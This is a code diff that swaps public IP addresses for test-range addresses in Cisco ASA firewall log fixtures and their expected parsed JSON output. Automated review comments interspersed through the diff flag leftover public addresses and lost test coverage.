-May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)
+May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)
 May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)
 May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063
 May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2
@@ -52,9 +52,9 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http:
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]
 Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23
 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/
-Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout
+Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout
 Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1"
-Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
+Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK
 Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'
 Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15
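Review bot: The rewritten 302026 and 302024 lines keep `8.8.8.5` as the mapped address while only the `8.8.8.8` side was swapped for `81.2.69.144`, so if the goal is to keep every public address in these fixtures inside the supported test subset, a public one still remains on both lines. The same applies to `Group = 100.60.140.10` on the 713120, 713905, 713902 and 713901 lines of the `@@ -62,24 +62,24 @@` hunk, which the commit leaves untouched (100.60.0.0 is outside the 100.64.0.0/10 shared range and is routable). Whether those values are geo-enriched by the pipeline cannot be told from this diff, so this may be intentional if only enriched fields were in scope; a one-line comment in the PR description stating which fields drove the selection would settle it.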
@@ -62,24 +62,24 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD
 Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin
 Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin"
 Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
-Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
+Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
 Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session
-Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.
+Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.
 Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.
-Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23
-Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally
-Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514
-Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412
-Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
-Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.
-Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.
-Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
-Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
-Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
-Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.
-Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23
+Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally
+Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514
+Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412
+Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
+Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.
+Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.
+Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
+Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
+Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
+Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.
+Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
index d0924ccae9e..6e288f1f5ac 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
@@ -6,7 +6,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.5.4"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 53500,
@@ -14,7 +14,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 53500,
@@ -54,9 +54,8 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.8",
- "192.168.2.2",
- "8.8.5.4"
+ "81.2.69.144",
+ "192.168.2.2"
 ]
 },
 "host": {
@@ -64,8 +63,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.554978200Z",
- "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
+ "ingested": "2021-12-09T13:33:30.615291700Z",
+ "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
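Review bot: Replacing both `8.8.8.8` and `8.8.5.4` with the same `81.2.69.144` in the `@@ -54,9 +54,8 @@` hunk collapses `related.ip` from four entries to three, so this document no longer distinguishes the source NAT address from the destination NAT address, and a regression that stopped appending either `source.nat.ip` or `destination.nat.ip` to `related.ip` would still pass. Using two distinct addresses from the supported test subset for the two NAT sides would keep that coverage while still avoiding real public IPs. The same collapse appears in the `@@ -142,9 +141,8 @@`, `@@ -483,9 +481,8 @@`, `@@ -1777,9 +1756,8 @@` and `@@ -1865,9 +1843,8 @@` hunks.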
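Review bot: Every `event.ingested` value in this file is rewritten (`2021-10-11T11:44:17...` to `2021-12-09T13:33:30...`) starting in the `@@ -64,8 +63,8 @@` hunk, including documents whose input line did not change, which buries the meaningful IP edits and guarantees the same churn on the next regeneration. If the package's pipeline test config supports a dynamic-field pattern for `event.ingested`, excluding it there would keep these fixtures stable across regenerations; if it does not, this is unavoidable noise but worth a mention in the PR description so reviewers can skip those lines.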
@@ -80,8 +79,8 @@
 "asa": {
 "destination_interface": "fw111",
 "mapped_source_port": 53500,
- "mapped_destination_ip": "8.8.5.4",
- "mapped_source_ip": "8.8.8.8",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "111111111",
 "source_interface": "net",
 "mapped_destination_port": 53500
@@ -94,7 +93,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.5.4"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 53500,
@@ -102,7 +101,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 53500,
@@ -142,9 +141,8 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.8",
- "192.168.2.2",
- "8.8.5.4"
+ "81.2.69.144",
+ "192.168.2.2"
 ]
 },
 "host": {
@@ -152,8 +150,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.554989100Z",
- "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
+ "ingested": "2021-12-09T13:33:30.615295400Z",
+ "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -168,8 +166,8 @@
 "asa": {
 "destination_interface": "fw111",
 "mapped_source_port": 53500,
- "mapped_destination_ip": "8.8.5.4",
- "mapped_source_ip": "8.8.8.8",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "111111111",
 "source_interface": "net",
 "mapped_destination_port": 53500
@@ -186,7 +184,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "ip": "192.168.2.2"
@@ -214,7 +212,7 @@
 ],
 "ip": [
 "192.168.2.2",
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -223,8 +221,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555012900Z",
- "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3",
+ "ingested": "2021-12-09T13:33:30.615300100Z",
+ "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3",
 "code": "302020",
 "kind": "event",
 "action": "flow-expiration",
@@ -238,7 +236,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "8.8.8.8",
+ "mapped_source_ip": "81.2.69.144",
 "icmp_type": 3,
 "icmp_code": 3
 }
@@ -284,7 +282,7 @@
 "event": {
 "severity": 7,
 "duration": 0,
- "ingested": "2021-10-11T11:44:17.555020700Z",
+ "ingested": "2021-12-09T13:33:30.615304900Z",
 "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00",
 "code": "609002",
 "kind": "event",
@@ -344,7 +342,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-10-11T11:44:17.555024900Z",
+ "ingested": "2021-12-09T13:33:30.615308900Z",
 "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2",
 "code": "609001",
 "kind": "event",
@@ -373,7 +371,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "ip": "192.168.2.2"
@@ -401,7 +399,7 @@
 ],
 "ip": [
 "192.168.2.2",
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -410,8 +408,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555028700Z",
- "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1",
+ "ingested": "2021-12-09T13:33:30.615312700Z",
+ "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1",
 "code": "302020",
 "kind": "event",
 "action": "flow-expiration",
@@ -425,7 +423,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "8.8.8.8",
+ "mapped_source_ip": "81.2.69.144",
 "icmp_type": 3,
 "icmp_code": 1
 }
@@ -437,7 +435,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.5.4"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 111,
@@ -445,7 +443,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 111,
@@ -483,9 +481,8 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.8",
- "192.168.2.2",
- "8.8.5.4"
+ "81.2.69.144",
+ "192.168.2.2"
 ]
 },
 "host": {
@@ -493,8 +490,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555034100Z",
- "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)",
+ "ingested": "2021-12-09T13:33:30.615317400Z",
+ "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)",
 "code": "805001",
 "kind": "event",
 "action": "firewall-rule",
@@ -509,8 +506,8 @@
 "asa": {
 "destination_interface": "fw111",
 "mapped_source_port": 111,
- "mapped_destination_ip": "8.8.5.4",
- "mapped_source_ip": "8.8.8.8",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "111111111",
 "source_interface": "fw111",
 "mapped_destination_port": 111
@@ -572,7 +569,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555040600Z",
+ "ingested": "2021-12-09T13:33:30.615321Z",
 "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)",
 "code": "805002",
 "kind": "event",
@@ -646,7 +643,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-10-11T11:44:17.555047Z",
+ "ingested": "2021-12-09T13:33:30.615326500Z",
 "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67",
 "code": "710005",
 "kind": "event",
@@ -728,7 +725,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555051200Z",
+ "ingested": "2021-12-09T13:33:30.615332400Z",
 "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log",
 "code": "303002",
 "kind": "event",
@@ -771,7 +768,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-10-11T11:44:17.555089800Z",
+ "ingested": "2021-12-09T13:33:30.615337300Z",
 "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4",
 "code": "710006",
 "kind": "event",
@@ -826,8 +823,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:44:17.555096600Z",
- "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.",
+ "ingested": "2021-12-09T13:33:30.615341400Z",
+ "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.",
 "code": "313005",
 "kind": "event",
 "action": "firewall-rule",
@@ -854,7 +851,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "ip": "10.10.10.10"
@@ -882,7 +879,7 @@
 ],
 "ip": [
 "10.10.10.10",
- "8.8.8.8",
+ "81.2.69.144",
 "192.168.2.2"
 ]
 },
@@ -891,8 +888,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555102900Z",
- "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0",
+ "ingested": "2021-12-09T13:33:30.615346400Z",
+ "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0",
 "code": "302021",
 "kind": "event",
 "action": "flow-expiration",
@@ -906,7 +903,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "8.8.8.8",
+ "mapped_source_ip": "81.2.69.144",
 "icmp_type": 8,
 "icmp_code": 0
 }
@@ -951,7 +948,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-10-11T11:44:17.555108500Z",
+ "ingested": "2021-12-09T13:33:30.615366600Z",
 "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10",
 "code": "609001",
 "kind": "event",
@@ -1010,7 +1007,7 @@
 "event": {
 "severity": 7,
 "duration": 0,
- "ingested": "2021-10-11T11:44:17.555114Z",
+ "ingested": "2021-12-09T13:33:30.615371800Z",
 "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00",
 "code": "609002",
 "kind": "event",
@@ -1041,7 +1038,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.192.46.90",
 "ip": "10.192.46.90"
@@ -1069,7 +1066,7 @@
 ],
 "ip": [
 "10.192.46.90",
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1078,8 +1075,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555121800Z",
- "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0",
+ "ingested": "2021-12-09T13:33:30.615376200Z",
+ "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0",
 "code": "302020",
 "kind": "event",
 "action": "flow-expiration",
@@ -1093,7 +1090,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "8.8.8.8"
+ "mapped_source_ip": "81.2.69.144"
 }
 }
 },
@@ -1107,7 +1104,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "ip": "192.168.2.2"
@@ -1135,7 +1132,7 @@
 ],
 "ip": [
 "192.168.2.2",
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1144,8 +1141,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555129600Z",
- "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3",
+ "ingested": "2021-12-09T13:33:30.615380200Z",
+ "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3",
 "code": "302020",
 "kind": "event",
 "action": "flow-expiration",
@@ -1159,7 +1156,7 @@
 },
 "cisco": {
 "asa": {
- "mapped_source_ip": "8.8.8.8",
+ "mapped_source_ip": "81.2.69.144",
 "icmp_type": 3,
 "icmp_code": 3
 }
@@ -1223,7 +1220,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP Reset-I",
- "ingested": "2021-10-11T11:44:17.555137100Z",
+ "ingested": "2021-12-09T13:33:30.615384900Z",
 "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1252,7 +1249,7 @@
 },
 "destination": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "10.10.10.10",
 "port": 54839,
@@ -1260,7 +1257,7 @@
 },
 "source": {
 "nat": {
- "ip": "8.8.8.8"
+ "ip": "81.2.69.144"
 },
 "address": "192.168.2.2",
 "port": 80,
@@ -1300,7 +1297,7 @@
 ],
 "ip": [
 "192.168.2.2",
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1309,8 +1306,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555144600Z",
- "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)",
+ "ingested": "2021-12-09T13:33:30.615389300Z",
+ "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -1325,8 +1322,8 @@
 "asa": {
 "destination_interface": "net",
 "mapped_source_port": 80,
- "mapped_destination_ip": "8.8.8.8",
- "mapped_source_ip": "8.8.8.8",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "1588662",
 "source_interface": "intfacename",
 "mapped_destination_port": 54839
@@ -1389,7 +1386,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-10-11T11:44:17.555152100Z",
+ "ingested": "2021-12-09T13:33:30.615393400Z",
 "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00",
 "code": "302012",
 "kind": "event",
@@ -1459,7 +1456,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:44:17.555159600Z",
+ "ingested": "2021-12-09T13:33:30.615397100Z",
 "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session",
 "code": "313004",
 "kind": "event",
@@ -1535,7 +1532,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555167200Z",
+ "ingested": "2021-12-09T13:33:30.615401300Z",
 "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006",
 "code": "305011",
 "kind": "event",
@@ -1605,7 +1602,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-10-11T11:44:17.555174900Z",
+ "ingested": "2021-12-09T13:33:30.615404900Z",
 "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111",
 "code": "106001",
 "kind": "event",
@@ -1630,27 +1627,9 @@
 "level": "critical"
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Thousand Oaks",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
- "location": {
- "lon": -118.8199,
- "lat": 34.197
- }
- },
- "as": {
- "number": 395776,
- "organization": {
- "name": "FEDERAL ONLINE GROUP LLC"
- }
- },
- "address": "192.186.2.2",
 "port": 53356,
- "ip": "192.186.2.2"
+ "address": "1192.168.2.2",
+ "domain": "1192.168.2.2"
 },
 "source": {
 "port": 161,
@@ -1687,11 +1666,11 @@
 },
 "related": {
 "hosts": [
- "dev01"
+ "dev01",
+ "1192.168.2.2"
 ],
 "ip": [
- "10.10.10.10",
- "192.186.2.2"
+ "10.10.10.10"
 ]
 },
 "host": {
@@ -1700,8 +1679,8 @@
 "event": {
 "severity": 2,
 "duration": 124000000000,
